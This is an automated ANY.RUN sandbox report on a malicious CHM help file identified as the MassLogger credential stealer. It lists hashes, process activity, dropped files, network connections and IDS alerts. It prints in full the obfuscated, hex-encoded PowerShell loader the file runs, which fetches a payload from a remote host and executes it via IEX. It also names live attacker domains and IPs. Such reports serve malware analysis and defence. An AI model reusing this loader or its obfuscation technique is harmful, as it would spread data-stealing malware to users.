analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

doc.chm

Full analysis: https://app.any.run/tasks/61a8f81c-2c67-4615-b690-2b17b064191c
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: October 20, 2020, 06:09:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
evasion
trojan
masslogger
stealer
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

301D4B2815D8EEB2A8BA5668A269D2BF

SHA1:

F0967158669AC3BB751F040064A5BBCD4BF5013F

SHA256:

A5E610B7CA55722AC964E6E589776A8304B2D3E532D2CE54FF50FEAEE89ADBC3

SSDEEP:

48:PZzgXA0BmQRlEFlErlEll5su816r1yHkLA45MwAWcYWcCav9YYDB8c7Z6WDJhx+K:PdwYp816r1DAZMcYFdV1DectbxuMlz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MASSLOGGER was detected

      • RegAsm.exe (PID: 2548)

    • Actions looks like stealing of personal data

      • RegAsm.exe (PID: 2548)

  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • Powershell.exe (PID: 2932)

    • Creates files in the user directory

      • hh.exe (PID: 2180)
      • Powershell.exe (PID: 2932)
      • powershell.exe (PID: 996)

    • Executes PowerShell scripts

      • hh.exe (PID: 2180)
      • RegAsm.exe (PID: 2548)

    • Reads internet explorer settings

      • hh.exe (PID: 2180)

    • Checks supported languages

      • RegAsm.exe (PID: 2548)

    • Checks for external IP

      • RegAsm.exe (PID: 2548)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chi | Windows HELP Index (81)
.chm | Windows HELP File (18.9)

EXIF

EXE

CHMVersion: 3
LanguageCode: English (U.S.)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start hh.exe no specs powershell.exe #MASSLOGGER regasm.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2180"C:\Windows\hh.exe" C:\Users\admin\Desktop\doc.chmC:\Windows\hh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2932"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden Set-PSReadlineOption -HistorySaveStyle SaveNothing;$diyyJ='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%72%32%72%02%47%96%C6%07%37%D2%02%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%24%43%F2%27%76%E2%E6%F6%96%37%96%67%F6%47%07%F6%F2%F2%A3%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%35%46%16%F6%C6%E6%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$diyyJ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`XC:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
hh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2548"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
0
Version:
4.7.3062.0 built by: NET472REL1
996"powershell" Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegAsm.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
813
Read events
667
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
2180hh.exeC:\Users\admin\AppData\Local\Temp\IMTF1D8.tmp
MD5:
SHA256:
2932Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TDU1X1495EG4O1VGQU4O.temp
MD5:
SHA256:
996powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\76QPLXIBPVYC4VFE4G6B.temp
MD5:
SHA256:
996powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3B8C240DEE430BE8DF9B69C157CDFD7E
SHA256:A891A7407FF50903818F57A766144C5BD6D6024A751F833A172D289AAE1CAF98
2932Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:12B7DCAA24D34D931DDB404D7F7F85B4
SHA256:7D3A643B7D80DEDE0AF1856BACC62F0FC11C43220AF9C270E20E498CE04DEA0C
2932Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF19fc58.TMPbinary
MD5:12B7DCAA24D34D931DDB404D7F7F85B4
SHA256:7D3A643B7D80DEDE0AF1856BACC62F0FC11C43220AF9C270E20E498CE04DEA0C
2180hh.exeC:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.datchm
MD5:767C30488AAA3C9E86CF5D23A4635AFC
SHA256:2FE04388636D6D5A91BCF0E49ABD84454AE258E862E09C7CA2CDCC8488C397CC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2932
Powershell.exe
GET
200
78.47.203.8:80
http://optovision.gr/4B.jpg
DE
text
2.59 Mb
unknown
2548
RegAsm.exe
GET
200
50.17.193.91:80
http://api.ipify.org/
US
text
15 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2548
RegAsm.exe
5.189.152.112:21
med-star.gr
Contabo GmbH
DE
malicious
2932
Powershell.exe
78.47.203.8:80
optovision.gr
Hetzner Online GmbH
DE
unknown
2548
RegAsm.exe
50.17.193.91:80
api.ipify.org
Amazon.com, Inc.
US
suspicious
5.189.152.112:59331
med-star.gr
Contabo GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.212.142
whitelisted
optovision.gr
  • 78.47.203.8
unknown
dns.msftncsi.com
  • 131.107.255.255
shared
api.ipify.org
  • 50.17.193.91
  • 23.21.126.66
  • 23.21.109.69
  • 54.225.169.28
  • 54.235.98.120
  • 54.204.14.42
  • 54.225.66.103
  • 54.235.182.194
shared
med-star.gr
  • 5.189.152.112
malicious

Threats

PID
Process
Class
Message
2548
RegAsm.exe
Misc activity
SUSPICIOUS [PTsecurity] External IP Lookup (possible MassLogger)
2548
RegAsm.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup api.ipify.org
2548
RegAsm.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
doc.chm